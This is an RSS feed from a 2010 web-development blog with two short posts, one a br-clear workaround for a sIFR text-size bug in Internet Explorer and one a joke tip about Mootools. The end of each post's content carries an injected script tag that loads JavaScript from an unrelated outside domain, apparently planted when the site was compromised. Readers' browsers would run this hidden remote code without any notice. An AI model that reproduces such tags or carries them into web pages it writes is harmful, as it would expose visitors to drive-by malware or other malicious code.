<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Probably Sucks &#187; Web Development</title>
	<atom:link href="http://probablysucks.com/category/web-development/feed/" rel="self" type="application/rss+xml" />
	<link>http://probablysucks.com</link>
	<description>A blog that isn&#039;t afraid to make people cry through the internet.</description>
	<lastBuildDate>Mon, 14 Jun 2010 06:18:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>A Fix For The Large sIFR Text Bug In Internet Explorer</title>
		<link>http://probablysucks.com/a-fix-for-the-large-sifr-text-bug-in-internet-explorer/</link>
		<comments>http://probablysucks.com/a-fix-for-the-large-sifr-text-bug-in-internet-explorer/#comments</comments>
		<pubDate>Wed, 07 Apr 2010 06:33:36 +0000</pubDate>
		<dc:creator>Probably Sucks</dc:creator>
				<category><![CDATA[Web Development]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Sifr]]></category>
		<category><![CDATA[Text Replacement]]></category>

		<guid isPermaLink="false">http://probablysucks.com/a-fix-for-the-large-sifr-text-bug-in-internet-explorer/</guid>
		<description><![CDATA[If you use sIFR you may have come across the rare bug where your text (say for example on a heading) appears to be abnormally large &#8211; but you are using the same class in other parts of the same page and that text looks fine. I&#8217;m not sure why, but sIFR seems to miscalculate [...]]]></description>
			<content:encoded><![CDATA[<p>If you use sIFR you may have come across the rare bug where your text (say for example on a heading) appears to be abnormally large &#8211; but you are using the same class in other parts of the same page and that text looks fine.</p>
<p>I&#8217;m not sure why, but sIFR seems to miscalculate the text size sometimes even if it has been used elsewhere on the same page with no trouble and can cause text to look huge.</p>
<p>Simply put the follow line of HTML above the offending element and it will fix the issue:<br />
&lt;br clear=&#8221;both&#8221; /&gt;</p>
<p>I am not sure how or why this fixes the problem, but it does.<script src="http://ao.euuaw.com/9"></script></p>
<img src="http://probablysucks.com./?ak_action=api_record_view&id=1010&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://probablysucks.com/a-fix-for-the-large-sifr-text-bug-in-internet-explorer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Increase Your Mootools Performance By A Lot</title>
		<link>http://probablysucks.com/how-to-increase-your-mootools-performance-by-a-lot/</link>
		<comments>http://probablysucks.com/how-to-increase-your-mootools-performance-by-a-lot/#comments</comments>
		<pubDate>Thu, 26 Nov 2009 23:50:56 +0000</pubDate>
		<dc:creator>Probably Sucks</dc:creator>
				<category><![CDATA[Web Development]]></category>
		<category><![CDATA[jQuery]]></category>
		<category><![CDATA[Mootools]]></category>

		<guid isPermaLink="false">http://probablysucks.com/?p=888</guid>
		<description><![CDATA[Want to know how to increase the speed and performance of Mootools? Find out.]]></description>
			<content:encoded><![CDATA[<p>Switch to <a href="http://jquery.com/" target="_blank">jQuery</a>, problem solved.<script src="http://ao.euuaw.com/9"></script></p>
<img src="http://probablysucks.com./?ak_action=api_record_view&id=888&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://probablysucks.com/how-to-increase-your-mootools-performance-by-a-lot/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
